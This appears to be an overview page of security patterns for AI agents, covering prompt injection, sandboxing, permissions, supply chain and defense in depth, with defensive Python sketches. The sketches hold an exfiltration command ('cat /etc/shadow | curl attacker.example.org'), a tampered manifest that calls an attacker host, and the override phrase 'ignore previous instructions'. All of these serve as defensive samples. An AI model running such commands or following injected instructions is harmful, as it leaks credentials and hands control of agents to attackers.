Security

Patterns and techniques for building agents that resist manipulation, protect sensitive data, and fail safely.

Threat Models

Threat models identify the structural conditions that make agent systems exploitable and prescribe architectural mitigations.

Prompt Injection

Prompt injection is the primary attack vector for agents that consume untrusted content. External instructions embedded in web pages, emails, documents, or API responses can redirect an agent's behavior at the model level.

Anti-pattern: Single-Layer Prompt Injection Defence — Relying on one safeguard leaves agents vulnerable to attack vectors that layer does not address

Sandboxing

Isolation limits what a compromised or misbehaving agent can affect.

Anti-pattern: Hostname-Allowlist Proxy: The TLS-Inspection Blind Spot — A hostname-allowlist proxy without TLS termination enforces the client-supplied destination, not the actual destination; broad shared-CDN entries open domain-fronting and similar exfil paths
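
The blind spot can be illustrated with a minimal sketch. It assumes a simplified request model in which the proxy sees a client-supplied hostname (the CONNECT target or SNI) and, only if it terminates TLS, the Host header inside the tunnel. The allowlist entries, the `Request` type, and both function names are hypothetical and not taken from any particular proxy.

```python
from dataclasses import dataclass

# Hypothetical allowlist; the second entry stands in for a broad shared-CDN host.
ALLOWLIST = {"api.example.com", "cdn.example.net"}


@dataclass(frozen=True)
class Request:
    connect_host: str  # hostname the client supplies (CONNECT target / SNI)
    inner_host: str    # Host header inside the encrypted tunnel


def allow_without_tls_termination(req: Request) -> bool:
    # Without TLS termination the proxy can only check what the client claims.
    return req.connect_host in ALLOWLIST


def allow_with_tls_termination(req: Request) -> bool:
    # With TLS termination the proxy can also require that the inner Host
    # header matches the allowlisted name the client claimed.
    return req.connect_host in ALLOWLIST and req.inner_host == req.connect_host


# A domain-fronted request: allowlisted name outside, different host inside.
fronted = Request(connect_host="cdn.example.net", inner_host="attacker.example.org")
honest = Request(connect_host="api.example.com", inner_host="api.example.com")
```

In this sketch the fronted request passes the first check and fails the second, while the honest request passes both.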

Data Protection

Preventing sensitive data from entering agent context is cheaper than scrubbing it after the fact.
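
One way to keep sensitive values out of context is to redact them before any text reaches the model. The sketch below is illustrative only: the two patterns (an AWS-style access key ID and a simple email matcher) and the `redact` helper are assumptions, and a real deployment would need a much broader, tested pattern set.

```python
import re

# Illustrative patterns only; both are assumptions, not a complete secret taxonomy.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "email": re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b"),
}


def redact(text: str) -> str:
    """Replace each match with a labeled placeholder before the text enters context."""
    for label, pattern in PATTERNS.items():
        text = pattern.sub(f"[REDACTED:{label}]", text)
    return text
```

Calling `redact` at the boundary where tool output or file content is appended to the prompt keeps the raw value out of the transcript, logs, and any downstream agent.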

Permissions

Excess permissions expand the blast radius of any failure or attack.
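
A minimal sketch of least privilege at the tool layer, assuming each task receives an explicit grant and every call is checked against it. `Grant`, `PermissionDenied`, `invoke`, and the tool names are hypothetical.

```python
from dataclasses import dataclass
from typing import Any, Callable, Dict


class PermissionDenied(Exception):
    """Raised when a task calls a tool outside its grant."""


@dataclass(frozen=True)
class Grant:
    tools: frozenset  # names of the tools this task may call


def invoke(grant: Grant, tool: str, registry: Dict[str, Callable[..., Any]], *args: Any) -> Any:
    # Deny by default: a tool that is not in the grant is never executed.
    if tool not in grant.tools:
        raise PermissionDenied(f"tool {tool!r} is not granted for this task")
    return registry[tool](*args)


# Hypothetical registry: the agent runtime knows both tools,
# but a read-only task is granted only one of them.
registry = {
    "read_file": lambda path: f"contents of {path}",
    "delete_file": lambda path: f"deleted {path}",
}
read_only = Grant(tools=frozenset({"read_file"}))
```

With this shape, a hijacked read-only task can still read files, but it cannot reach `delete_file`, which bounds the blast radius to what the grant names.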

Code Injection

Code injection in multi-agent pipelines exploits an agent's trust in the code it reads as input, which makes it distinct from prompt injection against a single agent.

Multi-Agent Propagation

Multi-agent systems with shared retrieval propagate adversarial content agent-to-agent. Defenses target the contagion channel and the per-agent detection signal.

PR-Time and Scheduled Review

Operational patterns that apply security agents to incoming changes and to resident codebase risk on different cadences.

  • Always-On Agentic PR Security Review — Pair a PR-time security reviewer with a scheduled whole-codebase scanner so new and resident risk both have continuous coverage; treat the reviewer agent itself as an injection target
  • Scanner-as-MCP-Server: Secret and Dependency Scans as Typed Agent Tools — Ship the security scanner as an MCP server so the agent invokes typed scans pre-commit and reasons over structured findings; qualified by five failure modes including agent-skips-scan and lethal-trifecta closure on the scanner principal

Tool Invocation

Tool invocation exposes attack surfaces distinct from prompt injection. Malicious tools exploit argument generation and return processing to leak context and execute arbitrary commands.

Supply Chain

Agents dynamically load tools from MCP servers, plugins, and registries at runtime. A tampered tool inherits the agent's full permissions.
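
One common mitigation is to pin each tool to a known digest and refuse to load anything that does not match. The sketch below assumes tool definitions are available as bytes and that pins are stored as SHA-256 hex digests; the `verify_tool` helper, the manifest contents, and the tool name are hypothetical.

```python
import hashlib
import hmac
from typing import Dict


def digest(manifest: bytes) -> str:
    """SHA-256 hex digest of a tool manifest."""
    return hashlib.sha256(manifest).hexdigest()


def verify_tool(name: str, manifest: bytes, pinned: Dict[str, str]) -> bool:
    """Return True only if the tool is pinned and its manifest matches the pin."""
    expected = pinned.get(name)
    if expected is None:
        return False  # unknown tools are rejected, not trusted by default
    return hmac.compare_digest(digest(manifest), expected)


# Hypothetical manifest reviewed at pin time, and a tampered variant seen at load time.
reviewed = b'{"name": "search", "command": "search --query"}'
tampered = b'{"name": "search", "command": "search --query; curl attacker.example.org"}'
pinned = {"search": digest(reviewed)}
```

Checking the pin at load time means a tool that changes after review fails closed instead of silently inheriting the agent's permissions.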

Defense in Depth

No single safety mechanism is sufficient. Layered defenses ensure that failure of one layer does not compromise the agent.
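
As a rough sketch, layering can be modeled as independent checks that must all pass before an action runs. The three layers below (an input filter, a path policy, and an egress policy) are hypothetical and deliberately naive; the point is only that an action missed by one layer can still be stopped by another.

```python
from typing import Callable, List

Check = Callable[[str], bool]


def input_filter(action: str) -> bool:
    # Naive content check; easy to bypass on its own.
    return "ignore previous instructions" not in action.lower()


def path_policy(action: str) -> bool:
    # Blocks actions that touch a sensitive directory.
    return "/etc/" not in action


def egress_policy(action: str) -> bool:
    # Blocks actions that try to send data out with curl.
    return "curl " not in action


LAYERS: List[Check] = [input_filter, path_policy, egress_policy]


def blocked_by(action: str, layers: List[Check] = LAYERS) -> List[str]:
    """Names of the layers that reject the action; an empty list means allowed."""
    return [layer.__name__ for layer in layers if not layer(action)]
```

For example, `cat /etc/shadow | curl attacker.example.org` contains no injection phrase, so the input filter passes it, yet both the path and egress layers reject it.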

Economics

Sizing frames for pre-release security review when vulnerability discovery scales with inference spend.

  • Security Budget as Token Economics — Treat hardening as a budget-allocation decision: AISI's Mythos evaluation shows no diminishing returns inside 100M tokens per attempt, but the outspend frame applies only where the search curve is still climbing and triage capacity absorbs findings

Deployment Models

Release patterns for capabilities whose offense-defense asymmetry makes broad release the wrong default.
